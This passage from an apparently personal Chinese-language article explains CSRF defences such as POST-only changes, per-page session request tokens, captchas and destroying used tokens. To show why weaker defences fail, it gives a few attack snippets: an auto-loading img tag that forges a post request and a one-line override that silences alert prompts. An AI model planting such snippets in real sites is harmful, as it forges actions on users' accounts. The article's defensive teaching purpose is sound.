只要有用户点击了这个链接,那么他们的帐户就会在不知情的情况下发布了这一帖子。可能这只是个恶作剧,但是既然发贴的请求可以伪造,那么删帖、转帐、改密码、发邮件全都可以伪造。
如何解决这个问题,我们是否可以效仿上文应对 XSS 的做法呢?过滤用户输入, 不允许发布这种含有站内操作 URL 的链接。这么做可能会有点用,但阻挡不了 CSRF,因为攻击者可以通过 QQ 或其他网站把这个链接发布上去,为了伪装可能还使用 bit.ly 压缩一下网址,这样点击到这个链接的用户还是一样会中招。所以对待 CSRF ,我们的视角需要和对待 XSS 有所区别。CSRF 并不一定要有站内的输入,因为它并不属于注入攻击,而是请求伪造。被伪造的请求可以是任何来源,而非一定是站内。所以我们唯有一条路可行,就是过滤请求的 处理者。
比较头痛的是,因为请求可以从任何一方发起,而发起请求的方式多种多样,可以通过 iframe、ajax(这个不能跨域,得先 XSS)、Flash 内部发起请求(总是个大隐患)。由于几乎没有彻底杜绝 CSRF 的方式,我们一般的做法,是以各种方式提高攻击的门槛。
首先可以提高的一个门槛,就是改良站内 API 的设计。对于发布帖子这一类创建资源的操作,应该只接受 POST 请求,而 GET 请求应该只浏览而不改变服务器端资源。当然,最理想的做法是使用 REST 风格 的 API 设计,GET、POST、PUT、DELETE 四种请求方法对应资源的读取、创建、修改、删除。现在的浏览器基本不支持在表单中使用 PUT 和 DELETE 请求方法,我们可以使用 ajax 提交请求(例如通过 jquery-form 插件,我最喜欢的做法),也可以使用隐藏域指定请求方法,然后用 POST 模拟 PUT 和 DELETE (Ruby on Rails 的做法)。这么一来,不同的资源操作区分的非常清楚,我们把问题域缩小到了非 GET 类型的请求上——攻击者已经不可能通过发布链接来伪造请求了,但他们仍可以发布表单,或者在其他站点上使用我们肉眼不可见的表单,在后台用 js 操作,伪造请求。
接下来我们就可以用比较简单也比较有效的方法来防御 CSRF,这个方法就是“请求令牌”。读过《J2EE 核心模式》的同学应该对“同步令牌”应该不会陌生,“请求令牌”和“同步令牌”原理是一样的,只不过目的不同,后者是为了解决 POST 请求重复提交问题,前者是为了保证收到的请求一定来自预期的页面。实现方法非常简单,首先服务器端要以某种策略生成随机字符串,作为令牌(token), 保存在 Session 里。然后在发出请求的页面,把该令牌以隐藏域一类的形式,与其他信息一并发出。在接收请求的页面,把接收到的信息中的令牌与 Session 中的令牌比较,只有一致的时候才处理请求,否则返回 HTTP 403 拒绝请求或者要求用户重新登陆验证身份。
请求令牌虽然使用起来简单,但并非不可破解,使用不当会增加安全隐患。使用请求令牌来防止 CSRF 有以下几点要注意:
虽然请求令牌原理和验证码有相似之处,但不应该像验证码一样,全局使用一个 Session Key。因为请求令牌的方法在理论上是可破解的,破解方式是解析来源页面的文本,获取令牌内容。如果全局使用一个 Session Key,那么危险系数会上升。原则上来说,每个页面的请求令牌都应该放在独立的 Session Key 中。我们在设计服务器端的时候,可以稍加封装,编写一个令牌工具包,将页面的标识作为 Session 中保存令牌的键。
在 ajax 技术应用较多的场合,因为很有请求是 JavaScript 发起的,使用静态的模版输出令牌值或多或少有些不方便。但无论如何,请不要提供直接获取令牌值的 API。这么做无疑是锁上了大门,却又把钥匙放在门口,让我们的请求令牌退化为同步令牌。
第一点说了请求令牌理论上是可破解的,所以非常重要的场合,应该考虑使用验证码(令牌的一种升级,目前来看破解难度极大),或者要求用户再次输入密码(亚马逊、淘宝的做法)。但这两种方式用户体验都不好,所以需要产品开发者权衡。
无论是普通的请求令牌还是验证码,服务器端验证过一定记得销毁。忘记销毁用过的令牌是个很低级但是杀伤力很大的错误。我们学校的选课系统就有这个 问题,验证码用完并未销毁,故只要获取一次验证码图片,其中的验证码可以在多次请求中使用(只要不再次刷新验证码图片),一直用到 Session 超时。这也是为何选课系统加了验证码,外挂软件升级一次之后仍然畅通无阻。
如下也列出一些据说能有效防范 CSRF,其实效果甚微的方式甚至无效的做法。
通过 referer 判定来源页面:referer 是在 HTTP Request Head 里面的,也就是由请求的发送者决定的。如果我喜欢,可以给 referer 任何值。当然这个做法并不是毫无作用,起码可以防小白。但我觉得性价比不如令牌。
过滤所有用户发布的链接:这个是最无效的做法,因为首先攻击者不一定要从站内发起请求(上面提到过了),而且就算从站内发起请求,途径也远远不知链接一条。比如 img src="./create_post.php" / 就是个不错的选择,还不需要用户去点击,只要用户的浏览器会自动加载图片,就会自动发起请求。 *在请求发起页面用 alert 弹窗提醒用户:这个方法看上去能干扰站外通过 iframe 发起的 CSRF,但攻击者也可以考虑用 window.alert = function(){}; 把 alert 弄哑,或者干脆脱离 iframe,使用 Flash 来达到目的。
总体来说,目前防御 CSRF 的诸多方法还没几个能彻底无解的。所以 CSDN 上看到讨论 CSRF 的文章,一般都会含有“无耻”二字来形容(另一位有该名号的貌似是 DDOS 攻击)。作为开发者,我们能做的就是尽量提高破解难度。当破解难度达到一定程度,网站就逼近于绝对安全的位置了(虽然不能到达)。上述请求令牌方法,就我 认为是最有可扩展性的,因为其原理和 CSRF 原理是相克的。CSRF 难以防御之处就在于对服务器端来说,伪造的请求和正常的请求本质上是一致的。而请求令牌的方法,则是揪出这种请求上的唯一区别——来源页面不同。我们还可 以做进一步的工作,例如让页面中 token 的 key 动态化,进一步提高攻击者的门槛。本文只是我个人认识的一个总结,便不讨论过深了。